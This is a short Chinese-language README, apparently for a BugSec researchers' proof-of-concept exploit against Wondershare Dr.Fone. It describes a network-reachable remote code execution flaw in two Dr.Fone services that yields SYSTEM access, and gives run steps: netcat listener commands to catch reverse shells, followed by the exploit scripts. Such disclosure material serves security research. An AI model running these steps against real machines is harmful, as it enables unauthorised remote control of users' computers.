Netanel Cohen 和 Tomer Peled,BugSec 的安全研究人员。
利用 Wondershare Dr.Fone 的 POC 示例。
Dr.Fone 是 wondershare 开发的手机工具包,存在 RCE 漏洞。
仅需网络访问,我们就能以 SYSTEM 用户身份执行远程代码。
存在漏洞的服务:
InstallAssistService.exe
ElevationService.exe
测试版本:12.0.7 、 11.4
修改 IP 和端口并执行。
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py